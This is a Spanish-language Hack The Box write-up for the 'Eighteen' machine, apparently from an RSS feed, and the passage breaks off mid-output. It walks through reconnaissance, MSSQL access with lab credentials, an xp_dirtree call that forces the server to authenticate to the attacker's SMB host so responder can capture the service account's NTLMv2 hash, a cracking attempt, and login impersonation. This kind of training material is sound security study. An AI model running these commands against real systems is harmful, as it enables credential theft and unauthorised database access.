https://sckull.github.io/tags/tunneling/ Recent content in Tunneling on sckull Hugo -- gohugo.io es ©{year}, All Rights Reserved Sat, 11 Apr 2026 00:00:00 +0000 daily daily https://sckull.github.io/posts/eighteen/ Sat, 11 Apr 2026 00:00:00 +0000 Sat, 11 Apr 2026 00:00:00 +0000 https://sckull.github.io/posts/eighteen/ Eighteen expone el servicio MSSQL donde, descubrimos credenciales que permitieron el acceso por WinRM. Se ejecuto ligolo para exponer los puertos locales. <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/eighteen/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>Eighteen expone el servicio MSSQL donde, descubrimos credenciales que permitieron el acceso por WinRM. Se ejecuto ligolo para exponer los puertos locales. Al enumerar los permisos del usuario, se identifico una configuracion de permisos en Active Directory que permitio realizar el ataque BadSuccessor, logrando la escalada de privilegios.</p> <table> <thead> <tr> <th>Nombre</th> <th align="center"><a href="https://app.hackthebox.com/machines/805">Eighteen</a></th> </tr> </thead> <tbody> <tr> <td><strong>OS</strong></td> <td align="center"><span><p class="os_type"> Windows <img src="https://sckull.github.io/images/icons/windows.png" class="img_type_os"/></p></span></td> </tr> <tr> <td><strong>Puntos</strong></td> <td align="center">20</td> </tr> <tr> <td><strong>Dificultad</strong></td> <td align="center">Easy</td> </tr> <tr> <td><strong>Fecha de Salida</strong></td> <td align="center">2025-11-15</td> </tr> <tr> <td><strong>IP</strong></td> <td align="center">10.129.121.22</td> </tr> <tr> <td><strong>Maker</strong></td> <td align="center"><span><p class="user_maker"> <a href="https://www.hackthebox.eu/home/users/profile/389926">kavigihan</a><img src="https://www.hackthebox.eu/badge/image/389926" class="img_user_maker"/> </p></span></td> </tr> <tr> <td> <a href="#" class="button" style="width: 72px; height: 30px; pointer-events: none;" data-color="default" target="_blank" rel="noreferrer"> <span class="button__text"> Rated </span> </a></td> <td align="center"><div class="box"><pre tabindex="0"><code class="language-chart" data-lang="chart">{ &#34;type&#34;: &#34;bar&#34;, &#34;data&#34;: { &#34;labels&#34;: [&#34;Cake&#34;, &#34;VeryEasy&#34;, &#34;Easy&#34;, &#34;TooEasy&#34;, &#34;Medium&#34;, &#34;BitHard&#34;,&#34;Hard&#34;,&#34;TooHard&#34;,&#34;ExHard&#34;,&#34;BrainFuck&#34;], &#34;datasets&#34;: [{ &#34;label&#34;: &#34;User Rated Difficulty&#34;, &#34;data&#34;: [192, 208, 1007, 1107, 666, 372, 363, 134, 43, 138], &#34;backgroundColor&#34;: [&#34;#9fef00&#34;,&#34;#9fef00&#34;,&#34;#9fef00&#34;, &#34;#ffaf00&#34;,&#34;#ffaf00&#34;,&#34;#ffaf00&#34;,&#34;#ffaf00&#34;, &#34;#ff3e3e&#34;,&#34;#ff3e3e&#34;,&#34;#ff3e3e&#34;] }] }, &#34;options&#34;: { &#34;scales&#34;: { &#34;xAxes&#34;: [{&#34;display&#34;: false}], &#34;yAxes&#34;: [{&#34;display&#34;: false}] }, &#34;legend&#34;: {&#34;labels&#34;: {&#34;fontColor&#34;: &#34;white&#34;}}, &#34;responsive&#34;: true } } </code></pre></div></td> </tr> </tbody> </table> <h1 id="machine-information-certified">Machine Information: Certified</h1> <p>La descripcion de la maquina emula una situacion &ldquo;real&rdquo; de un pentest proporcionando credenciales.</p> <blockquote> <p>As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!</p> </blockquote> <h1 id="recon">Recon</h1> <h2 id="nmap">nmap</h2> <p><code>nmap</code> muestra multiples puertos abiertos: http (80), mssql (1433) y winrm (5985).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Nmap 7.95 scan initiated Sat Nov 15 14:13:40 2025 as: /usr/lib/nmap/nmap --privileged -p80,1433,5985 -sV -sC -oN nmap_scan 10.129.121.22</span> </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.129.121.22 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.066s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">80/tcp open http Microsoft IIS httpd 10.0 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://eighteen.htb/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/10.0 </span></span><span class="line"><span class="cl">1433/tcp open ms-sql-s Microsoft SQL Server <span class="m">2022</span> 16.00.1000.00<span class="p">;</span> RTM </span></span><span class="line"><span class="cl"><span class="p">|</span> ms-sql-info: </span></span><span class="line"><span class="cl"><span class="p">|</span> 10.129.121.22:1433: </span></span><span class="line"><span class="cl"><span class="p">|</span> Version: </span></span><span class="line"><span class="cl"><span class="p">|</span> name: Microsoft SQL Server <span class="m">2022</span> RTM </span></span><span class="line"><span class="cl"><span class="p">|</span> number: 16.00.1000.00 </span></span><span class="line"><span class="cl"><span class="p">|</span> Product: Microsoft SQL Server <span class="m">2022</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Service pack level: RTM </span></span><span class="line"><span class="cl"><span class="p">|</span> Post-SP patches applied: <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ TCP port: <span class="m">1433</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>SSL_Self_Signed_Fallback </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2025-11-16T02:45:47 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2055-11-16T02:45:47 </span></span><span class="line"><span class="cl"><span class="p">|</span> ms-sql-ntlm-info: </span></span><span class="line"><span class="cl"><span class="p">|</span> 10.129.121.22:1433: </span></span><span class="line"><span class="cl"><span class="p">|</span> Target_Name: EIGHTEEN </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS_Domain_Name: EIGHTEEN </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS_Computer_Name: DC01 </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Domain_Name: eighteen.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Computer_Name: DC01.eighteen.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Tree_Name: eighteen.htb </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Product_Version: 10.0.26100 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-11-16T03:13:55+00:00<span class="p">;</span> +7h00m01s from scanner time. </span></span><span class="line"><span class="cl">5985/tcp open http Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl">Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl"><span class="c1"># Nmap done at Sat Nov 15 14:13:54 2025 -- 1 IP address (1 host up) scanned in 13.96 seconds</span> </span></span></code></pre></td></tr></table> </div> </div><p>Agregamos a nuestro archivo <code>/etc/hosts</code> los valores <code>eighteen.htb</code> <code>dc01.eighteen.htb</code>.</p> <h2 id="service-access">Service Access</h2> <p>Las credenciales tienen acceso por mssql.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec mssql eighteen.htb -u kevin -p <span class="s1">&#39;iNa2we6haRj2gaw!&#39;</span> --local-auth </span></span><span class="line"><span class="cl">MSSQL 10.129.121.22 <span class="m">1433</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">11</span> / Server <span class="m">2025</span> Build <span class="m">26100</span> <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:eighteen.htb<span class="o">)</span> </span></span><span class="line"><span class="cl">MSSQL 10.129.121.22 <span class="m">1433</span> DC01 <span class="o">[</span>+<span class="o">]</span> DC01<span class="se">\k</span>evin:iNa2we6haRj2gaw! </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="web-site">Web Site</h2> <p>Los headers indican un servidor Microsoft-IIS.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ curl -sI eighteen.htb </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Content-Length: <span class="m">2253</span> </span></span><span class="line"><span class="cl">Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8 </span></span><span class="line"><span class="cl">Vary: Cookie </span></span><span class="line"><span class="cl">Server: Microsoft-IIS/10.0 </span></span><span class="line"><span class="cl">Date: Sun, <span class="m">16</span> Nov <span class="m">2025</span> 04:48:22 GMT </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>El sitio muestra una tematica financiera.</p> <p><img alt="image" src="https://sckull.github.io/images/posts/htb/eighteen/2025_1511319564756.png"></p> <p>Explica como funciona.</p> <p><img alt="image" src="https://sckull.github.io/images/posts/htb/eighteen/2025_1511319544954.png"></p> <p>Existen dos formularios, para registro y login.</p> <p><img alt="image" src="https://sckull.github.io/images/posts/htb/eighteen/2026_2001020530853.png"></p> <p><img alt="image" src="https://sckull.github.io/images/posts/htb/eighteen/2026_2001020230923.png"></p> <h3 id="directory-brute-forcing">Directory Brute Forcing</h3> <p><code>feroxbuster</code> muestra que existe /admin.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ feroxbuster -u http://eighteen.htb/ -w <span class="nv">$CM</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ___ ___ __ __ __ __ __ ___ </span></span><span class="line"><span class="cl"><span class="p">|</span>__ <span class="p">|</span>__ <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span> / <span class="sb">`</span> / <span class="se">\ \_</span>/ <span class="p">|</span> <span class="p">|</span> <span class="se">\ </span><span class="p">|</span>__ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span>___ <span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\_</span>_, <span class="se">\_</span>_/ / <span class="se">\ </span><span class="p">|</span> <span class="p">|</span>__/ <span class="p">|</span>___ </span></span><span class="line"><span class="cl">by Ben <span class="s2">&#34;epi&#34;</span> Risher 🤓 ver: 2.13.0 </span></span><span class="line"><span class="cl">───────────────────────────┬────────────────────── </span></span><span class="line"><span class="cl"> 🎯 Target Url │ http://eighteen.htb/ </span></span><span class="line"><span class="cl"> 🚩 In-Scope Url │ eighteen.htb </span></span><span class="line"><span class="cl"> 🚀 Threads │ <span class="m">50</span> </span></span><span class="line"><span class="cl"> 📖 Wordlist │ /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"> 👌 Status Codes │ All Status Codes! </span></span><span class="line"><span class="cl"> 💥 Timeout <span class="o">(</span>secs<span class="o">)</span> │ <span class="m">7</span> </span></span><span class="line"><span class="cl"> 🦡 User-Agent │ feroxbuster/2.13.0 </span></span><span class="line"><span class="cl"> 💉 Config File │ /etc/feroxbuster/ferox-config.toml </span></span><span class="line"><span class="cl"> 🔎 Extract Links │ <span class="nb">true</span> </span></span><span class="line"><span class="cl"> 🏁 HTTP methods │ <span class="o">[</span>GET<span class="o">]</span> </span></span><span class="line"><span class="cl"> 🔃 Recursion Depth │ <span class="m">4</span> </span></span><span class="line"><span class="cl">───────────────────────────┴────────────────────── </span></span><span class="line"><span class="cl"> 🏁 Press <span class="o">[</span>ENTER<span class="o">]</span> to use the Scan Management Menu™ </span></span><span class="line"><span class="cl">────────────────────────────────────────────────── </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 5l 31w 207c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 603l 1072w 9601c http://eighteen.htb/static/css/style.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 76l 145w 2421c http://eighteen.htb/register </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 88l 203w 2822c http://eighteen.htb/features </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 66l 121w 1961c http://eighteen.htb/login </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 74l 156w 2253c http://eighteen.htb/ </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 5l 22w 199c http://eighteen.htb/admin <span class="o">=</span>&gt; http://eighteen.htb/login </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 5l 22w 199c http://eighteen.htb/dashboard <span class="o">=</span>&gt; http://eighteen.htb/login </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 5l 22w 189c http://eighteen.htb/logout <span class="o">=</span>&gt; http://eighteen.htb/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://eighteen.htb/lost+found </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://eighteen.htb/web.config </span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">####################] - 8s 4622/4622 0s found:10 errors:0 </span> </span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">####################] - 8s 4614/4614 593/s http://eighteen.htb/</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="user-register">User Register</h2> <p>Se realizo un registr de usuario.</p> <p><img alt="image" src="https://sckull.github.io/images/posts/htb/eighteen/2025_1511319345034.png"></p> <p>No se encontro nada relevante en el sitio.</p> <p><img alt="image" src="https://sckull.github.io/images/posts/htb/eighteen/2025_1511319575057.png"></p> <h1 id="mssql">MSSQL</h1> <p>Ingresamos por mssql con las credenciales iniciales.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ impacket-mssqlclient -dc-ip 10.129.121.22 -p <span class="m">1433</span> kevin:<span class="s1">&#39;iNa2we6haRj2gaw!&#39;</span>@eighteen.htb </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Encryption required, switching to TLS </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>DATABASE<span class="o">)</span>: Old Value: master, New Value: master </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>LANGUAGE<span class="o">)</span>: Old Value: , New Value: us_english </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>PACKETSIZE<span class="o">)</span>: Old Value: 4096, New Value: <span class="m">16192</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> INFO<span class="o">(</span>DC01<span class="o">)</span>: Line 1: Changed database context to <span class="s1">&#39;master&#39;</span>. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> INFO<span class="o">(</span>DC01<span class="o">)</span>: Line 1: Changed language setting to us_english. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ACK: Result: <span class="m">1</span> - Microsoft SQL Server <span class="o">(</span><span class="m">160</span> 3232<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>kevin guest@master<span class="o">)</span>&gt; <span class="k">select</span> user_name<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----- </span></span><span class="line"><span class="cl">guest </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>kevin guest@master<span class="o">)</span>&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="grab-the-hash">Grab the Hash</h2> <p>Utilizamos <code>xp_dirtree</code> para obtener el hash del usuario svc.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SQL <span class="o">(</span>kevin guest@master<span class="o">)</span>&gt; xp_dirtree <span class="se">\\</span>10.10.14.64<span class="se">\s</span>c<span class="se">\ </span></span></span><span class="line"><span class="cl"><span class="se"></span>subdirectory depth file </span></span><span class="line"><span class="cl">------------ ----- ---- </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>kevin guest@master<span class="o">)</span>&gt; </span></span></code></pre></td></tr></table> </div> </div><p><code>responder</code> muestra al usuario <code>mssqlsvc</code> junto con el hash NTLM.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Listening <span class="k">for</span> events... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Client : 10.129.121.22 </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Username : EIGHTEEN<span class="se">\m</span>ssqlsvc </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Hash : mssqlsvc::EIGHTEEN:8fbce4abfccb9959:2434A5789FE8FE438791855270C7A670:010100000000000000A33FE64356DC0131FCCA0DEE6B2D6F000000000200080049004E004800390001001E00570049004E002D004200310039004400330048003900330031003700310004003400570049004E002D00420031003900440033004800390033003100370031002E0049004E00480039002E004C004F00430041004C000300140049004E00480039002E004C004F00430041004C000500140049004E00480039002E004C004F00430041004C000700080000A33FE64356DC01060004000200000008003000300000000000000000000000003000009C07F4FB3F07BFA27372E4956B39E593B11C21756FB871CDACE6DEBF1C226ED30A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00360034000000000000000000 </span></span></code></pre></td></tr></table> </div> </div><h3 id="cracking-the-hash">Cracking the Hash</h3> <p>Tras intentar crackear el hash, este no fue encontrado en el wordlist rockyo.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ john SMB-NTLMv2-SSP-10.129.121.22.txt --wordlist<span class="o">=</span><span class="nv">$ROCK</span> </span></span><span class="line"><span class="cl">Using default input encoding: UTF-8 </span></span><span class="line"><span class="cl">Loaded <span class="m">2</span> password hashes with <span class="m">2</span> different salts <span class="o">(</span>netntlmv2, NTLMv2 C/R <span class="o">[</span>MD4 HMAC-MD5 32/64<span class="o">])</span> </span></span><span class="line"><span class="cl">Will run <span class="m">4</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl">0g 0:00:00:06 DONE <span class="o">(</span>2025-11-15 15:26<span class="o">)</span> 0g/s 2066Kp/s 4133Kc/s 4133KC/s !<span class="o">)(</span>OPPQR..*7¡Vamos! </span></span><span class="line"><span class="cl">Session completed. </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="db-access">DB Access</h2> <p>Encontramos que existe la base de datos <code>financial_planner</code> sin embargo, kevin no tiene acceso a esta.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SQL <span class="o">(</span>kevin guest@master<span class="o">)</span>&gt; enum_db </span></span><span class="line"><span class="cl">name is_trustworthy_on </span></span><span class="line"><span class="cl">----------------- ----------------- </span></span><span class="line"><span class="cl">master <span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">tempdb <span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">model <span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">msdb <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">financial_planner <span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>kevin guest@master<span class="o">)</span>&gt; use financial_planner </span></span><span class="line"><span class="cl">ERROR<span class="o">(</span>DC01<span class="o">)</span>: Line 1: The server principal <span class="s2">&#34;kevin&#34;</span> is not able to access the database <span class="s2">&#34;financial_planner&#34;</span> under the current security context. </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>kevin guest@master<span class="o">)</span>&gt; </span></span></code></pre></td></tr></table> </div> </div><p><code>enum_logins</code> muestra que existe un login para appdev. Utilizamos <code>exec_as_login</code> con este usuario para tener acceso a la base de datos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SQL <span class="o">(</span>kevin guest@master<span class="o">)</span>&gt; enum_logins </span></span><span class="line"><span class="cl">name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin </span></span><span class="line"><span class="cl">------ --------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- --------- </span></span><span class="line"><span class="cl">sa SQL_LOGIN <span class="m">0</span> <span class="m">1</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">kevin SQL_LOGIN <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">appdev SQL_LOGIN <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>kevin guest@master<span class="o">)</span>&gt; exec_as_login appdev </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>appdev appdev@master<span class="o">)</span>&gt; use financial_planner </span></span><span class="line"><span class="cl">ENVCHANGE<span class="o">(</span>DATABASE<span class="o">)</span>: Old Value: master, New Value: financial_planner </span></span><span class="line"><span class="cl">INFO<span class="o">(</span>DC01<span class="o">)</span>: Line 1: Changed database context to <span class="s1">&#39;financial_planner&#39;</span>. </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>appdev appdev@financial_planner<span class="o">)</span>&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Existe la tabla <code>users</code>, dentro encontramos el hash de contrasena para el usuario admin.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SQL <span class="o">(</span>appdev appdev@financial_planner<span class="o">)</span>&gt; SELECT name FROM sys.tables WHERE <span class="nv">type_desc</span> <span class="o">=</span> <span class="s1">&#39;USER_TABLE&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">name </span></span><span class="line"><span class="cl">----------- </span></span><span class="line"><span class="cl">users </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">incomes </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">expenses </span></span><span class="line"><span class="cl"> 